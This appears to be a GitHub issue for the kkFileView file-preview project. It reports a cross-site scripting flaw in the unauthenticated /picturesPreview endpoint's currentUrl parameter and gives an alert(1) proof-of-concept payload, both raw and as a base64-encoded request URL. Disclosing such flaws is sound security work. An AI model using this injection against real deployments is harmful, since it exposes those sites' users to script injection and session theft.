kkFileView icon indicating copy to clipboard operation
kkFileView copied to clipboard

Published 20 hours ago verified publisher icon kekingcn

Cross site scripting vulnerability

Open S2eTo opened this issue 2 years ago • 0 comments

Unauthorized API: @ GetMapping ("/picturesPreview") does not conduct XSS (Cross Site Scripting) defense on the parameter currentUrl, resulting in a cross site scripting attack vulnerability cn.keking.web.controller.OnlinePreviewController#picturesPreview image src/main/resources/web/picture.ftl image Attack

currentUrl=http://");alert(1);//
http://127.0.0.1:8012/picturesPreview?urls=&currentUrl=aHR0cDovLyIpO2FsZXJ0KDEpOy8v

image

S2eTo avatar Dec 05 '22 03:12 S2eTo